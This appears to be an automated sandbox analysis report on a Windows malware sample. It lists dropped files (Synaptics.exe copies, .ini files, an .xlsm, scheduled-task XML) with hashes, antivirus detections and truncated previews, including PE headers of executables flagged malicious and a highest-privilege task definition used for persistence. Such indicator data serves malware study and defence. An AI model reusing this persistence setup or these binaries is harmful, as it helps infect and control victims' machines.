                                                  SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                                  MD5:61CCF53571C9ABA6511D696CB0D32E45
                                                  SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                                  SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                                  SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log

                                                  Download File
                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):525
                                                  Entropy (8bit):5.2874233355119316
                                                  Encrypted:false
                                                  SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                                  MD5:61CCF53571C9ABA6511D696CB0D32E45
                                                  SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                                  SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                                  SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Synaptics.exe.log

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1299
                                                  Entropy (8bit):5.353835388147306
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
                                                  MD5:D7428B0428DC5FA72A41122D265CFA0E
                                                  SHA1:F485E2EC6F980F218063AF527724C088617B3B94
                                                  SHA-256:C49B31FB28F5EC1B5A82D45DF4A0A88DBC26E468BA007D8E63C800BA69CC5FFC
                                                  SHA-512:FD5BC965FD28DC219F2703726A34A7156D1B71B9199617136F936DD5DDBB2CA65175FBB4B761243635493D6CABE3069406B4D4473DEEB93FDCDA1F392345683B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\y8kdmHi6x3.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1299
                                                  Entropy (8bit):5.353835388147306
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
                                                  MD5:D7428B0428DC5FA72A41122D265CFA0E
                                                  SHA1:F485E2EC6F980F218063AF527724C088617B3B94
                                                  SHA-256:C49B31FB28F5EC1B5A82D45DF4A0A88DBC26E468BA007D8E63C800BA69CC5FFC
                                                  SHA-512:FD5BC965FD28DC219F2703726A34A7156D1B71B9199617136F936DD5DDBB2CA65175FBB4B761243635493D6CABE3069406B4D4473DEEB93FDCDA1F392345683B
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                  C:\Users\user\AppData\Local\Temp\9KIhjIt.ini

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.

                                                  C:\Users\user\AppData\Local\Temp\BU7W824.ini

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.

                                                  C:\Users\user\AppData\Local\Temp\DznDQdc.ini

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.

                                                  C:\Users\user\AppData\Local\Temp\Frrvc3Eg.xlsm

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:Microsoft Excel 2007+
                                                  Category:dropped
                                                  Size (bytes):18387
                                                  Entropy (8bit):7.523057953697544
                                                  Encrypted:false
                                                  SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                  MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                  SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                  SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                  SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                  C:\Users\user\AppData\Local\Temp\GljuS4w.ini

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.

                                                  C:\Users\user\AppData\Local\Temp\I9E2jd4.ini

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.

                                                  C:\Users\user\AppData\Local\Temp\OJxXIBO.ini

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.

                                                  C:\Users\user\AppData\Local\Temp\RCX788E.tmp

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4167168
                                                  Entropy (8bit):7.943250272423679
                                                  Encrypted:false
                                                  SSDEEP:98304:hAdDDetDKXiJb1VVmkMqYJlAdDDetDKXiJb1VVmkM3YJ:hAdmZHJxVVm/q6AdmZHJxVVm/3
                                                  MD5:FD4A5ADDD934F8102F8E9046F247E7E1
                                                  SHA1:969099E84FC39E8B7E11EA9B64E91004D0078D98
                                                  SHA-256:8E37D5419EF05382F863549AB137FED6077D554A208B2B8D7EE7C886A8BE9BC5
                                                  SHA-512:A4DC71877C688E77F7160268BED41369654BE049C5B465262FF65473F03B676ADE9070DC1956BCD357141909DC906E468A696A79B17357750C440853D6F40B42
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a......................#.....N.... ........@.. ........................@...........@.....................................K.......4.#...................?...................................................... ............... ..H............text...T.... ...................... ..`.rsrc...4.#.......#.................@..@.reloc........?.......?.............@..B................0.......H.......H...............X"...t..........................................Z(.....(....s....(....*..(....*6.(.....(....*....0.......... .a..(....(....r...p(....(....o......r...po......(.....~....-6 ....r3..p......(...............(......(....(.........~....{....~.....o....*...........0.............. ...%.....(.....s ....s!..... ....o".... ....o#...($...r;..po%........ ....s&.........o'....[o(...o).......o*....[o(...o+.....o,.....o-....s............io/.....o0.......,...o1.....o2..

                                                  C:\Users\user\AppData\Local\Temp\RCX831F.tmp

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4171264
                                                  Entropy (8bit):7.942432292986639
                                                  Encrypted:false
                                                  SSDEEP:98304:dAdDDetDKXiJb1VVmkM2YJlAdDDetDKXiJb1VVmkM3YJ:dAdmZHJxVVm/26AdmZHJxVVm/3
                                                  MD5:46CFD9EFDDF98B4F1A57A69F3809D9BF
                                                  SHA1:5BD87CD64A90D8DDC194A9C3CA30A50F6136B7A5
                                                  SHA-256:7704A9C5892432FB9FC7598D2AA2043DDFE66774516E22081B5588B649942875
                                                  SHA-512:099FDDDBB8204118290FA34945B615C32FC43F35C014F7878541586FACB105E02845FCBBD7E3CF185BF3FDB3773F1EBF5D3E39776F3F9EDFB797D8B36DC69991
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 47%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a......................#.....N.... ........@.. ........................@...........@.....................................K.........#...................?...................................................... ............... ..H............text...T.... ...................... ..`.rsrc.....#.......#.................@..@.reloc........?.......?.............@..B................0.......H.......H...............X"...t..........................................Z(.....(....s....(....*..(....*6.(.....(....*....0.......... .a..(....(....r...p(....(....o......r...po......(.....~....-6 ....r3..p......(...............(......(....(.........~....{....~.....o....*...........0.............. ...%.....(.....s ....s!..... ....o".... ....o#...($...r;..po%........ ....s&.........o'....[o(...o).......o*....[o(...o+.....o,.....o-....s............io/.....o0.......,...o1.....o2..

                                                  C:\Users\user\AppData\Local\Temp\WDTsgHT.ini

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.

                                                  C:\Users\user\AppData\Local\Temp\Z3HHv1Q.ini

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:modified
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.

                                                  C:\Users\user\AppData\Local\Temp\Z3Rs92O.ini

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.

                                                  C:\Users\user\AppData\Local\Temp\avIDvaN.ini

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.

                                                  C:\Users\user\AppData\Local\Temp\ohdSUNQ.ini

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.

                                                  C:\Users\user\AppData\Local\Temp\tmp939D.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1305
                                                  Entropy (8bit):5.1279304049103
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0zxtn:cbk4oL600QydbQxIYODOLedq3aj
                                                  MD5:CE1E105B814F21C2A8D8AE70C583BC43
                                                  SHA1:DE60AC2CE59CDA55AC1BE7CA321512A0354BB91F
                                                  SHA-256:07E5E7E6FEC07D784FF48078F45906F0DE3998015F884A6339ECD90F6C75A39C
                                                  SHA-512:9A92FFDB658D3FBB65DD4976A00FC84848602E6724D7631F4F2AE37EF1810E86724B9803B009187D720D14359023AFCFE62484659E5D050A2A101C07AC13657F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

                                                  C:\Users\user\AppData\Local\Temp\tmp9EC9.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1310
                                                  Entropy (8bit):5.109425792877704
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                                  MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                                  SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                                  SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                                  SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

                                                  C:\Users\user\AppData\Local\Temp\vaJuLhu.ini

                                                  Download File
